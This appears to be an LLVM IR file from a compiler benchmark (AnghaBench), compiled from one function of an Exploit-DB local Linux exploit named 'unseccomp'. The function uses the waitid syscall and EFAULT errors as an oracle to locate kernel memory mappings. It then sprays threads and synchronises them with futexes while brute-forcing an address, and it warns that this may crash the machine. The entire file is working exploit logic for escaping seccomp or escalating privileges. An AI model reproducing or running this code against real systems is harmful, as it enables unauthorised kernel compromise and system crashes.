; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_43127.c_unseccomp.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_43127.c_unseccomp.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@SYS_waitid = common dso_local global i32 0, align 4
@P_ALL = common dso_local global i32 0, align 4
@WEXITED = common dso_local global i32 0, align 4
@errno = common dso_local global i32 0, align 4
@mapping_begin = common dso_local global i64 0, align 8
@.str = private unnamed_addr constant [21 x i8] c"found mapping at %p\0A\00", align 1
@.str.1 = private unnamed_addr constant [25 x i8] c"found mapping end at %p\0A\00", align 1
@mapping_end = common dso_local global i64 0, align 8
@barrier1 = common dso_local global i32 0, align 4
@barrier2 = common dso_local global i32 0, align 4
@NUM_THREAD_SPRAY = common dso_local global i32 0, align 4
@num_threads = common dso_local global i32 0, align 4
@g_threads = common dso_local global i32* null, align 8
@thread_attr = common dso_local global i32 0, align 4
@thread_guy = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [22 x i8] c"pthread create error\0A\00", align 1
@.str.3 = private unnamed_addr constant [4 x i8] c"%d\0A\00", align 1
@.str.4 = private unnamed_addr constant [20 x i8] c"%d threads created\0A\00", align 1
@.str.5 = private unnamed_addr constant [28 x i8] c"found second mapping at %p\0A\00", align 1
@.str.6 = private unnamed_addr constant [32 x i8] c"found second mapping end at %p\0A\00", align 1
@.str.7 = private unnamed_addr constant [27 x i8] c"found third mapping at %p\0A\00", align 1
@.str.8 = private unnamed_addr constant [31 x i8] c"found third mapping end at %p\0A\00", align 1
@.str.9 = private unnamed_addr constant [29 x i8] c"last_mapping is 0x%lx bytes\0A\00", align 1
@.str.10 = private unnamed_addr constant [15 x i8] c"min guess %lx\0A\00", align 1
@.str.11 = private unnamed_addr constant [19 x i8] c"starting guessing\0A\00", align 1
@.str.12 = private unnamed_addr constant [60 x i8] c"this part can take up to a minute, or crash the machine :)\0A\00", align 1
@found_one = common dso_local global i64 0, align 8
@spray_offset = common dso_local global i64 0, align 8
@g_addr_guess = common dso_local global i64 0, align 8
@threads_run = common dso_local global i32 0, align 4
@FUTEX_WAKE = common dso_local global i32 0, align 4
@INT_MAX = common dso_local global i32 0, align 4
@.str.13 = private unnamed_addr constant [17 x i8] c"joining threads\0A\00", align 1
@.str.14 = private unnamed_addr constant [22 x i8] c"done joining threads\0A\00", align 1
@.str.15 = private unnamed_addr constant [39 x i8] c"apparently we found one sleep forever\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @unseccomp() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i64, align 8
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i32, align 4
  %6 = alloca i64, align 8
  %7 = alloca i64, align 8
  %8 = alloca i64, align 8
  %9 = alloca i64, align 8
  %10 = alloca i32, align 4
  %11 = alloca i32, align 4
  %12 = alloca i64, align 8
  %13 = alloca i64, align 8
  %14 = alloca i32, align 4
  %15 = alloca i32, align 4
  %16 = alloca i64, align 8
  store i64 -140737488355328, i64* %2, align 8
  br label %17

17:                                               ; preds = %0, %31
  %18 = load i32, i32* @SYS_waitid, align 4
  %19 = load i32, i32* @P_ALL, align 4
  %20 = load i64, i64* %2, align 8
  %21 = add i64 %20, 4064
  %22 = load i32, i32* @WEXITED, align 4
  %23 = call i32 @syscall(i32 %18, i32 %19, i32 0, i64 %21, i32 %22, i32* null)
  store i32 %23, i32* %4, align 4
  %24 = load i32, i32* @errno, align 4
  %25 = icmp ne i32 %24, 14
  br i1 %25, label %26, label %31

26:                                               ; preds = %17
  %27 = load i64, i64* %2, align 8
  store i64 %27, i64* @mapping_begin, align 8
  %28 = load i64, i64* %2, align 8
  %29 = inttoptr i64 %28 to i8*
  %30 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str, i64 0, i64 0), i8* %29)
  br label %34

31:                                               ; preds = %17
  %32 = load i64, i64* %2, align 8
  %33 = add i64 %32, 268435456
  store i64 %33, i64* %2, align 8
  br label %17

34:                                               ; preds = %26
  br label %35

35:                                               ; preds = %34, %53
  %36 = load i64, i64* %2, align 8
  %37 = add i64 %36, 268435456
  store i64 %37, i64* %2, align 8
  %38 = load i32, i32* @SYS_waitid, align 4
  %39 = load i32, i32* @P_ALL, align 4
  %40 = load i64, i64* %2, align 8
  %41 = add i64 %40, 4064
  %42 = load i32, i32* @WEXITED, align 4
  %43 = call i32 @syscall(i32 %38, i32 %39, i32 0, i64 %41, i32 %42, i32* null)
  store i32 %43, i32* %5, align 4
  %44 = load i32, i32* @errno, align 4
  %45 = icmp eq i32 %44, 14
  br i1 %45, label %46, label %53

46:                                               ; preds = %35
  %47 = load i64, i64* %2, align 8
  %48 = inttoptr i64 %47 to i8*
  %49 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.1, i64 0, i64 0), i8* %48)
  %50 = load i64, i64* %2, align 8
  store i64 %50, i64* @mapping_end, align 8
  %51 = load i64, i64* %2, align 8
  %52 = sub i64 %51, 268435456
  store i64 %52, i64* %2, align 8
  br label %54

53:                                               ; preds = %35
  br label %35

54:                                               ; preds = %46
  store i32 0, i32* @barrier1, align 4
  store i32 0, i32* @barrier2, align 4
  store i32 0, i32* %1, align 4
  br label %55

55:                                               ; preds = %73, %54
  %56 = load i32, i32* %1, align 4
  %57 = load i32, i32* @NUM_THREAD_SPRAY, align 4
  %58 = icmp slt i32 %56, %57
  br i1 %58, label %59, label %76

59:                                               ; preds = %55
  %60 = load i32, i32* %1, align 4
  store i32 %60, i32* @num_threads, align 4
  %61 = load i32*, i32** @g_threads, align 8
  %62 = load i32, i32* %1, align 4
  %63 = sext i32 %62 to i64
  %64 = getelementptr inbounds i32, i32* %61, i64 %63
  %65 = load i32, i32* @thread_guy, align 4
  %66 = call i64 @pthread_create(i32* %64, i32* @thread_attr, i32 %65, i32* null)
  %67 = icmp ne i64 %66, 0
  br i1 %67, label %68, label %72

68:                                               ; preds = %59
  %69 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str.2, i64 0, i64 0))
  %70 = load i32, i32* %1, align 4
  %71 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.3, i64 0, i64 0), i32 %70)
  br label %76

72:                                               ; preds = %59
  br label %73

73:                                               ; preds = %72
  %74 = load i32, i32* %1, align 4
  %75 = add nsw i32 %74, 1
  store i32 %75, i32* %1, align 4
  br label %55

76:                                               ; preds = %68, %55
  %77 = load i32, i32* @num_threads, align 4
  %78 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.4, i64 0, i64 0), i32 %77)
  %79 = call i32 @usleep(i32 100000)
  br label %80

80:                                               ; preds = %76, %99
  %81 = load i64, i64* %2, align 8
  %82 = add i64 %81, 268435456
  store i64 %82, i64* %2, align 8
  %83 = load i32, i32* @SYS_waitid, align 4
  %84 = load i32, i32* @P_ALL, align 4
  %85 = load i64, i64* %2, align 8
  %86 = add i64 %85, 4064
  %87 = load i32, i32* @WEXITED, align 4
  %88 = call i32 @syscall(i32 %83, i32 %84, i32 0, i64 %86, i32 %87, i32* null)
  store i32 %88, i32* %10, align 4
  %89 = load i32, i32* @errno, align 4
  %90 = icmp ne i32 %89, 14
  br i1 %90, label %91, label %99

91:                                               ; preds = %80
  %92 = load i64, i64* %2, align 8
  %93 = inttoptr i64 %92 to i8*
  %94 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.5, i64 0, i64 0), i8* %93)
  %95 = load i64, i64* %2, align 8
  store i64 %95, i64* %8, align 8
  %96 = load i64, i64* %8, align 8
  store i64 %96, i64* %6, align 8
  %97 = load i64, i64* %2, align 8
  %98 = sub i64 %97, 268435456
  store i64 %98, i64* %2, align 8
  br label %100

99:                                               ; preds = %80
  br label %80

100:                                              ; preds = %91
  br label %101

101:                                              ; preds = %100, %120
  %102 = load i64, i64* %2, align 8
  %103 = add i64 %102, 268435456
  store i64 %103, i64* %2, align 8
  %104 = load i32, i32* @SYS_waitid, align 4
  %105 = load i32, i32* @P_ALL, align 4
  %106 = load i64, i64* %2, align 8
  %107 = add i64 %106, 4064
  %108 = load i32, i32* @WEXITED, align 4
  %109 = call i32 @syscall(i32 %104, i32 %105, i32 0, i64 %107, i32 %108, i32* null)
  store i32 %109, i32* %11, align 4
  %110 = load i32, i32* @errno, align 4
  %111 = icmp eq i32 %110, 14
  br i1 %111, label %112, label %120

112:                                              ; preds = %101
  %113 = load i64, i64* %2, align 8
  %114 = inttoptr i64 %113 to i8*
  %115 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([32 x i8], [32 x i8]* @.str.6, i64 0, i64 0), i8* %114)
  %116 = load i64, i64* %2, align 8
  store i64 %116, i64* %9, align 8
  %117 = load i64, i64* %9, align 8
  store i64 %117, i64* %7, align 8
  %118 = load i64, i64* %2, align 8
  %119 = sub i64 %118, 268435456
  store i64 %119, i64* %2, align 8
  br label %121

120:                                              ; preds = %101
  br label %101

121:                                              ; preds = %112
  store i64 0, i64* %12, align 8
  %122 = call i32 @usleep(i32 100000)
  br label %123

123:                                              ; preds = %147, %121
  %124 = load i64, i64* %2, align 8
  %125 = load i64, i64* %9, align 8
  %126 = add i64 %125, 4294967296
  %127 = icmp ult i64 %124, %126
  br i1 %127, label %128, label %148

128:                                              ; preds = %123
  %129 = load i64, i64* %2, align 8
  %130 = add i64 %129, 268435456
  store i64 %130, i64* %2, align 8
  %131 = load i32, i32* @SYS_waitid, align 4
  %132 = load i32, i32* @P_ALL, align 4
  %133 = load i64, i64* %2, align 8
  %134 = add i64 %133, 4064
  %135 = load i32, i32* @WEXITED, align 4
  %136 = call i32 @syscall(i32 %131, i32 %132, i32 0, i64 %134, i32 %135, i32* null)
  store i32 %136, i32* %14, align 4
  %137 = load i32, i32* @errno, align 4
  %138 = icmp ne i32 %137, 14
  br i1 %138, label %139, label %147

139:                                              ; preds = %128
  %140 = load i64, i64* %2, align 8
  %141 = inttoptr i64 %140 to i8*
  %142 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.7, i64 0, i64 0), i8* %141)
  %143 = load i64, i64* %2, align 8
  store i64 %143, i64* %12, align 8
  %144 = load i64, i64* %12, align 8
  store i64 %144, i64* %6, align 8
  %145 = load i64, i64* %2, align 8
  %146 = sub i64 %145, 268435456
  store i64 %146, i64* %2, align 8
  br label %148

147:                                              ; preds = %128
  br label %123

148:                                              ; preds = %139, %123
  %149 = load i64, i64* %12, align 8
  %150 = icmp ne i64 %149, 0
  br i1 %150, label %151, label %173

151:                                              ; preds = %148
  br label %152

152:                                              ; preds = %151, %171
  %153 = load i64, i64* %2, align 8
  %154 = add i64 %153, 268435456
  store i64 %154, i64* %2, align 8
  %155 = load i32, i32* @SYS_waitid, align 4
  %156 = load i32, i32* @P_ALL, align 4
  %157 = load i64, i64* %2, align 8
  %158 = add i64 %157, 4064
  %159 = load i32, i32* @WEXITED, align 4
  %160 = call i32 @syscall(i32 %155, i32 %156, i32 0, i64 %158, i32 %159, i32* null)
  store i32 %160, i32* %15, align 4
  %161 = load i32, i32* @errno, align 4
  %162 = icmp eq i32 %161, 14
  br i1 %162, label %163, label %171

163:                                              ; preds = %152
  %164 = load i64, i64* %2, align 8
  %165 = inttoptr i64 %164 to i8*
  %166 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([31 x i8], [31 x i8]* @.str.8, i64 0, i64 0), i8* %165)
  %167 = load i64, i64* %2, align 8
  store i64 %167, i64* %13, align 8
  %168 = load i64, i64* %13, align 8
  store i64 %168, i64* %7, align 8
  %169 = load i64, i64* %2, align 8
  %170 = sub i64 %169, 268435456
  store i64 %170, i64* %2, align 8
  br label %172

171:                                              ; preds = %152
  br label %152

172:                                              ; preds = %163
  br label %173

173:                                              ; preds = %172, %148
  %174 = load i64, i64* %7, align 8
  %175 = sub i64 %174, 4294967296
  store i64 %175, i64* %2, align 8
  %176 = load i64, i64* %7, align 8
  %177 = load i64, i64* %6, align 8
  %178 = sub i64 %176, %177
  %179 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str.9, i64 0, i64 0), i64 %178)
  %180 = load i64, i64* %2, align 8
  %181 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.10, i64 0, i64 0), i64 %180)
  %182 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.11, i64 0, i64 0))
  %183 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([60 x i8], [60 x i8]* @.str.12, i64 0, i64 0))
  store i32 0, i32* %1, align 4
  br label %184

184:                                              ; preds = %278, %173
  %185 = load i64, i64* @found_one, align 8
  %186 = icmp ne i64 %185, 0
  %187 = xor i1 %186, true
  br i1 %187, label %188, label %281

188:                                              ; preds = %184
  %189 = load i64, i64* %2, align 8
  %190 = add i64 %189, 8388608
  store i64 %190, i64* %2, align 8
  %191 = load i64, i64* %2, align 8
  %192 = load i64, i64* @spray_offset, align 8
  %193 = add i64 %191, %192
  store i64 %193, i64* %16, align 8
  %194 = load i32, i32* @SYS_waitid, align 4
  %195 = load i32, i32* @P_ALL, align 4
  %196 = load i64, i64* %16, align 8
  %197 = sub i64 %196, 26
  %198 = load i32, i32* @WEXITED, align 4
  %199 = call i32 @syscall(i32 %194, i32 %195, i32 0, i64 %197, i32 %198, i32* null)
  %200 = load i64, i64* %16, align 8
  store i64 %200, i64* @g_addr_guess, align 8
  store i32 0, i32* @barrier2, align 4
  store i32 0, i32* @threads_run, align 4
  store i32 1, i32* @barrier1, align 4
  %201 = load i32, i32* @FUTEX_WAKE, align 4
  %202 = load i32, i32* @INT_MAX, align 4
  %203 = call i32 @futex(i32* @barrier1, i32 %201, i32 %202, i32* null, i32* null, i32 0)
  br label %204

204:                                              ; preds = %236, %188
  %205 = load i32, i32* @threads_run, align 4
  %206 = load i32, i32* @num_threads, align 4
  %207 = icmp slt i32 %205, %206
  br i1 %207, label %208, label %238

208:                                              ; preds = %204
  %209 = load i64, i64* @found_one, align 8
  %210 = icmp ne i64 %209, 0
  br i1 %210, label %211, label %236

211:                                              ; preds = %208
  store i32 1, i32* @barrier1, align 4
  store i32 1, i32* @barrier2, align 4
  %212 = load i32, i32* @FUTEX_WAKE, align 4
  %213 = load i32, i32* @INT_MAX, align 4
  %214 = call i32 @futex(i32* @barrier1, i32 %212, i32 %213, i32* null, i32* null, i32 0)
  %215 = load i32, i32* @FUTEX_WAKE, align 4
  %216 = load i32, i32* @INT_MAX, align 4
  %217 = call i32 @futex(i32* @barrier2, i32 %215, i32 %216, i32* null, i32* null, i32 0)
  %218 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.13, i64 0, i64 0))
  store i32 0, i32* %1, align 4
  br label %219

219:                                              ; preds = %230, %211
  %220 = load i32, i32* %1, align 4
  %221 = load i32, i32* @num_threads, align 4
  %222 = icmp slt i32 %220, %221
  br i1 %222, label %223, label %233

223:                                              ; preds = %219
  %224 = load i32*, i32** @g_threads, align 8
  %225 = load i32, i32* %1, align 4
  %226 = sext i32 %225 to i64
  %227 = getelementptr inbounds i32, i32* %224, i64 %226
  %228 = load i32, i32* %227, align 4
  %229 = call i32 @pthread_join(i32 %228, i32* null)
  br label %230

230:                                              ; preds = %223
  %231 = load i32, i32* %1, align 4
  %232 = add nsw i32 %231, 1
  store i32 %232, i32* %1, align 4
  br label %219

233:                                              ; preds = %219
  %234 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str.14, i64 0, i64 0))
  %235 = call i32 @sleep(i32 1000)
  br label %236

236:                                              ; preds = %233, %208
  %237 = call i32 @usleep(i32 10000)
  br label %204

238:                                              ; preds = %204
  store i32 1, i32* @barrier2, align 4
  store i32 0, i32* @barrier1, align 4
  %239 = load i32, i32* @FUTEX_WAKE, align 4
  %240 = load i32, i32* @INT_MAX, align 4
  %241 = call i32 @futex(i32* @barrier2, i32 %239, i32 %240, i32* null, i32* null, i32 0)
  br label %242

242:                                              ; preds = %276, %238
  %243 = load i32, i32* @threads_run, align 4
  %244 = load i32, i32* @num_threads, align 4
  %245 = mul nsw i32 %244, 2
  %246 = icmp slt i32 %243, %245
  br i1 %246, label %247, label %278

247:                                              ; preds = %242
  %248 = load i64, i64* @found_one, align 8
  %249 = icmp ne i64 %248, 0
  br i1 %249, label %250, label %276

250:                                              ; preds = %247
  %251 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([39 x i8], [39 x i8]* @.str.15, i64 0, i64 0))
  store i32 1, i32* @barrier1, align 4
  store i32 1, i32* @barrier2, align 4
  %252 = load i32, i32* @FUTEX_WAKE, align 4
  %253 = load i32, i32* @INT_MAX, align 4
  %254 = call i32 @futex(i32* @barrier1, i32 %252, i32 %253, i32* null, i32* null, i32 0)
  %255 = load i32, i32* @FUTEX_WAKE, align 4
  %256 = load i32, i32* @INT_MAX, align 4
  %257 = call i32 @futex(i32* @barrier2, i32 %255, i32 %256, i32* null, i32* null, i32 0)
  %258 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.13, i64 0, i64 0))
  store i32 0, i32* %1, align 4
  br label %259

259:                                              ; preds = %270, %250
  %260 = load i32, i32* %1, align 4
  %261 = load i32, i32* @num_threads, align 4
  %262 = icmp slt i32 %260, %261
  br i1 %262, label %263, label %273

263:                                              ; preds = %259
  %264 = load i32*, i32** @g_threads, align 8
  %265 = load i32, i32* %1, align 4
  %266 = sext i32 %265 to i64
  %267 = getelementptr inbounds i32, i32* %264, i64 %266
  %268 = load i32, i32* %267, align 4
  %269 = call i32 @pthread_join(i32 %268, i32* null)
  br label %270

270:                                              ; preds = %263
  %271 = load i32, i32* %1, align 4
  %272 = add nsw i32 %271, 1
  store i32 %272, i32* %1, align 4
  br label %259

273:                                              ; preds = %259
  %274 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str.14, i64 0, i64 0))
  %275 = call i32 @sleep(i32 100000)
  br label %276

276:                                              ; preds = %273, %247
  %277 = call i32 @usleep(i32 10000)
  br label %242

278:                                              ; preds = %242
  store i32 0, i32* @threads_run, align 4
  store i32 0, i32* @barrier2, align 4
  %279 = load i32, i32* %1, align 4
  %280 = add nsw i32 %279, 1
  store i32 %280, i32* %1, align 4
  br label %184

281:                                              ; preds = %184
  ret void
}

declare dso_local i32 @syscall(i32, i32, i32, i64, i32, i32*) #1

declare dso_local i32 @printf(i8*, ...) #1

declare !callback !2 dso_local i64 @pthread_create(i32*, i32*, i32, i32*) #1

declare dso_local i32 @usleep(i32) #1

declare dso_local i32 @futex(i32*, i32, i32, i32*, i32*, i32) #1

declare dso_local i32 @pthread_join(i32, i32*) #1

declare dso_local i32 @sleep(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
!2 = !{!3}
!3 = !{i64 2, i64 3, i1 false}
